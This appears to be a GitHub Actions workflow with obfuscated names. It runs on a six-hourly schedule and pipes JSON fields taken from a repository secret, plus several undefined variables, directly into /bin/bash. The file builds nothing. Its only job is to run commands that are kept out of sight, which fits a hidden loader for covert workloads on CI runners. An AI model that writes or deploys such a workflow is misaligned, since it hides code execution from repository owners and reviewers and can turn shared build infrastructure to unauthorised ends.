name: chunnainium

on:
  workflow_dispatch:
  schedule:
    - cron: '55 1/6 * * *'

jobs:  # 23000
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: chunnainium
        env:
          bbdq3: ${{ secrets.bbdq3 }}
        run: |
          echo $bbdq3 | jq -r .el1 | /bin/bash
          echo $ls6 | jq -r .lhl54675 | /bin/bash
          echo $rytq254 | jq -r .i25896 | /bin/bash
          echo $duqyc8532 | jq -r .uh537 | /bin/bash
          echo $mxsw01331 | jq -r .yl0001 | /bin/bash

